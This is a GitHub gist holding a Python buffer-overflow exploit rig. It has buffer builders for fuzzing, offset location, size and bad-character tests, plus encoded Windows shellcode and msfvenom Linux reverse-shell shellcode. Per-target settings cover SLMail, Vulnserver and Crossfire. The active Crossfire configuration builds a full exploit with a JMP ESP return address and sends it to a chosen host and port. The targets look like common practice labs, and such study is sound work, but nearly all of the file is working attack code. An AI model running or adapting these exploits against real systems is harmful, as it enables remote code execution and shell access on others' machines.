Created
March 15, 2020 13:31
-
-
Save GlennPegden2/8936cda566eb0629f19c4b3c0dcd96c2 to your computer and use it in GitHub Desktop.
Test rig to help find traditional buffer overflows (reminds me of steps and acts as a skeleton for functions needed)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import time, struct, sys | |
| import socket as so | |
| def sendPayload(cmd): | |
| # print("Sent: %s\nSize %i\nRSize %i " % (cmd , len(cmd) , len(cmd) -(len(preCMD) +len(postCMD)))) | |
| try: | |
| s.send(cmd) | |
| print(repr(s.recv(1024))) | |
| except: | |
| print("[!] connection refused to %s:%i, check debugger" % (server,port)) | |
| def getPlainBuffer(preCMD,postCMD,maxOverflowBufferSize): | |
| plainPad = b'A' * maxOverflowBufferSize | |
| return(preCMD + plainPad + postCMD) | |
| def getLocateBuffer(preCMD,postCMD,maxOverflowBufferSize): | |
| #LocateBuffer: Generates a buffer hander for testing EIP overflow offset | |
| #Generated with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5000 | |
| #Good for buffers up to 5000 | |
| locateBuffer = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"[:maxOverflowBufferSize] | |
| if maxOverflowBufferSize > len(locateBuffer): | |
| print("Warning: Max Buffer Size is greater than locate buffer length") | |
| return(preCMD + locateBuffer + postCMD) | |
| def getSizeTestBuffer(preCMD,postCMD,preEIPSize,postEIPSize,EIPmarker): | |
| #sizeTestBuffer: This should drop D0C0FFEE in EIP , Xcc..ccX in the buffer, if it ends in ccX then complete buffer fits | |
| sizeTestBuffer = preCMD + b"A" * preEIPSize + EIPmarker + b"X" + b"C" * (postEIPSize-2) + b"X" + postCMD | |
| return(sizeTestBuffer) | |
| def getBadCharStr(preCMD,postCMD,overflowBufferOffset,maxOverflowBufferSize,badChrLst): | |
| blockStr = b'' | |
| for i in range(0,0xFF): | |
| if i not in badChrLst: | |
| blockStr += bytes([i]) | |
| blockBS = blockStr | |
| if maxOverflowBufferSize < overflowBufferOffset + len(blockStr): | |
| print("Warning: Max Buffer Size is less than bad block test string") | |
| badChrTestString = preCMD + b"A" * overflowBufferOffset + blockBS + ((maxOverflowBufferSize) - (overflowBufferOffset + len(blockStr) )-2) * b"B" + postCMD | |
| return(badChrTestString) | |
| def getNOPSled(size): | |
| return() | |
| # |-------------------------------- FullCMD ----------------------------------| | |
| # |---- PreCMD ---- | ------------- OverlowBuffer ------------ | ---- PostCMD ----- | | |
| # | --- PreEIP --- | EIP | --- PostEIP --- | | |
| EIPmarker = b'\xee\xff\xc0\xd0' | |
| winShellcode = ( | |
| b"\xdb\xd3\xbb\xc4\xa0\xf4\x26\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" | |
| b"\x52\x83\xc6\x04\x31\x5e\x13\x03\x9a\xb3\x16\xd3\xde\x5c\x54" | |
| b"\x1c\x1e\x9d\x39\x94\xfb\xac\x79\xc2\x88\x9f\x49\x80\xdc\x13" | |
| b"\x21\xc4\xf4\xa0\x47\xc1\xfb\x01\xed\x37\x32\x91\x5e\x0b\x55" | |
| b"\x11\x9d\x58\xb5\x28\x6e\xad\xb4\x6d\x93\x5c\xe4\x26\xdf\xf3" | |
| b"\x18\x42\x95\xcf\x93\x18\x3b\x48\x40\xe8\x3a\x79\xd7\x62\x65" | |
| b"\x59\xd6\xa7\x1d\xd0\xc0\xa4\x18\xaa\x7b\x1e\xd6\x2d\xad\x6e" | |
| b"\x17\x81\x90\x5e\xea\xdb\xd5\x59\x15\xae\x2f\x9a\xa8\xa9\xf4" | |
| b"\xe0\x76\x3f\xee\x43\xfc\xe7\xca\x72\xd1\x7e\x99\x79\x9e\xf5" | |
| b"\xc5\x9d\x21\xd9\x7e\x99\xaa\xdc\x50\x2b\xe8\xfa\x74\x77\xaa" | |
| b"\x63\x2d\xdd\x1d\x9b\x2d\xbe\xc2\x39\x26\x53\x16\x30\x65\x3c" | |
| b"\xdb\x79\x95\xbc\x73\x09\xe6\x8e\xdc\xa1\x60\xa3\x95\x6f\x77" | |
| b"\xc4\x8f\xc8\xe7\x3b\x30\x29\x2e\xf8\x64\x79\x58\x29\x05\x12" | |
| b"\x98\xd6\xd0\xb5\xc8\x78\x8b\x75\xb8\x38\x7b\x1e\xd2\xb6\xa4" | |
| b"\x3e\xdd\x1c\xcd\xd5\x24\xf7\x32\x81\x79\x2b\xdb\xd0\x85\x32" | |
| b"\xa0\x5c\x63\x5e\xc6\x08\x3c\xf7\x7f\x11\xb6\x66\x7f\x8f\xb3" | |
| b"\xa9\x0b\x3c\x44\x67\xfc\x49\x56\x10\x0c\x04\x04\xb7\x13\xb2" | |
| b"\x20\x5b\x81\x59\xb0\x12\xba\xf5\xe7\x73\x0c\x0c\x6d\x6e\x37" | |
| b"\xa6\x93\x73\xa1\x81\x17\xa8\x12\x0f\x96\x3d\x2e\x2b\x88\xfb" | |
| b"\xaf\x77\xfc\x53\xe6\x21\xaa\x15\x50\x80\x04\xcc\x0f\x4a\xc0" | |
| b"\x89\x63\x4d\x96\x95\xa9\x3b\x76\x27\x04\x7a\x89\x88\xc0\x8a" | |
| b"\xf2\xf4\x70\x74\x29\xbd\x91\x97\xfb\xc8\x39\x0e\x6e\x71\x24" | |
| b"\xb1\x45\xb6\x51\x32\x6f\x47\xa6\x2a\x1a\x42\xe2\xec\xf7\x3e" | |
| b"\x7b\x99\xf7\xed\x7c\x88" | |
| ) | |
| #msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20" | |
| linuxShellcode = ( | |
| b"\xbb\x87\xbc\xc0\xcb\xd9\xc5\xd9\x74\x24\xf4\x5d\x31\xc9\xb1" | |
| b"\x12\x31\x5d\x12\x03\x5d\x12\x83\x42\xb8\x22\x3e\x7d\x1a\x55" | |
| b"\x22\x2e\xdf\xc9\xcf\xd2\x56\x0c\xbf\xb4\xa5\x4f\x53\x61\x86" | |
| b"\x6f\x99\x11\xaf\xf6\xd8\x79\x4f\x09\x1b\x78\xc7\x0b\x1b\x7b" | |
| b"\xac\x85\xfa\xcb\xb4\xc5\xad\x78\x8a\xe5\xc4\x9f\x21\x69\x84" | |
| b"\x37\xd4\x45\x5a\xaf\x40\xb5\xb3\x4d\xf8\x40\x28\xc3\xa9\xdb" | |
| b"\x4e\x53\x46\x11\x10" | |
| ) | |
| # Notes for find jmps with mona. !mona modules to find a module then some handy OPCodes to look for | |
| # Exploit specific Variables | |
| ##SLMail | |
| ## | |
| #preCMD = b"PASS " | |
| #postCMD = b"" | |
| #maxOverflowBufferSize = 2700 | |
| #preEIPSize = 2606 # From pattern_offset.rb after locate crash | |
| #postEIPSize = 400 # Experiment with how much of a buffer we have spare - 351 is probably minimum for a whell | |
| #badChrLst = [0x00,0x0a,0x0d,0xff] | |
| #EIPjmpDst = b'\x8f\x35\x4a\x5f' # Wherever you want you exploit to jmp to (normally a jmp back to where your payload is). Remember Endian switch | |
| #preEIP = preEIPSize * b'A' | |
| #postEIP = getNOPSled(12) + shellcode | |
| #overflowBufferOffset = 0 # Where to stick the bad char test, 0 fro PreEIP buffer <preEIPSize + 4> for post EIP buffer | |
| #exploitStr = preCMD + preEIP + EIPjmpDst + postEIP + postCMD | |
| ##Vulnserver.exe | |
| ## | |
| #preCMD = b"AUTH " | |
| #postCMD = b"" | |
| #maxOverflowBufferSize = 1140 | |
| #preEIPSize = 1040 # From pattern_offset.rb after locate crash | |
| #postEIPSize = 400 # Experiment with how much of a buffer we have spare - 351 is probably minimum for a whell | |
| #badChrLst = [0x00,0x0a,0x0d,0xff] | |
| #EIPjmpDst = '' # Wherever you want you exploit to jmp to (normally a jmp back to where your payload is). Remember Endian switch | |
| #preEIP = preEIPSize * b'A' | |
| #postEIP = getNOPSled(8) + shellcode + getNOPSled(maxOverflowBufferSize - len(shellcode)) | |
| #overflowBufferOffset = 0 # Where to stick the bad char test, 0 fro PreEIP buffer <preEIPSize + 4> for post EIP buffer | |
| #exploitStr = preCMD + preEIP + EIPjmpDst + postEIP + postCMD | |
| #Crossfire | |
| #Payload wont fit in PostEIP like normal, but it will fit in PreEIP which | |
| # locater str in EIP = 46367046 which gives 4368 | |
| preCMD = b'\x11(setup sound ' | |
| postCMD = b'\x90\x00#' | |
| maxOverflowBufferSize = 4379 | |
| preEIPSize = 4368 # From pattern_offset.rb after locate crashpostEIPSize = 2 # Experiment with how much of a buffer we have spare - 351 is probably minimum for a whell | |
| postEIPSize = maxOverflowBufferSize - (preEIPSize + 4) | |
| badChrLst = [0x00,0x0a,0x0d,0x20,0xff] | |
| EIPjmpDst = b'\x97\x45\x13\x08' # JMP ESP (found by edb OpCode Search), Don't forget Endian Swicth | |
| ESP = b'\x83\xc0\x0c\xff\xe0\x90\x90' # ADD EAX,12 , JMP EAX | |
| preEIP = linuxShellcode + ((preEIPSize - len(linuxShellcode) ) * b'A') | |
| postEIP = ESP + (postEIPSize-len(ESP)) * b"D" | |
| overflowBufferOffset = 0 # Where to stick the bad char test, 0 fro PreEIP buffer <preEIPSize + 4> for post EIP buffer | |
| exploitStr = preCMD + preEIP + EIPjmpDst + postEIP + postCMD | |
| #print("mOBs: %i (%i/%i)\n-EIP (%i/%i)\n+EIP (%i/%i)" % (maxOverflowBufferSize,preEIPSize+postEIPSize+4,len(preEIP)+len(postEIP)+4,preEIPSize,len(preEIP),postEIPSize,len(postEIP))) | |
| try: | |
| server = sys.argv[1] | |
| port = int(sys.argv[2]) | |
| except IndexError: | |
| print("[+] Usage %s host port" % sys.argv[0]) | |
| sys.exit() | |
| s = so.socket(so.AF_INET, so.SOCK_STREAM) | |
| s.connect((server, port)) | |
| print(repr(s.recv(1024))) | |
| ##SLMail | |
| #s.send("USER test\r\n") | |
| #s.recv(1024) | |
| #sendPayload(exploitStr) | |
| ##Vulnserver | |
| #sendPayload(exploitStr) | |
| #Crossfire | |
| #sendPayload(getPlainBuffer(preCMD,postCMD,maxOverflowBufferSize)) | |
| #sendPayload(getLocateBuffer(preCMD,postCMD,maxOverflowBufferSize)) | |
| #sendPayload(getSizeTestBuffer(preCMD,postCMD,preEIPSize,postEIPSize,EIPmarker)) | |
| #sendPayload(getBadCharStr(preCMD,postCMD,overflowBufferOffset,maxOverflowBufferSize,badChrLst)) | |
| sendPayload(exploitStr) | |
| s.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment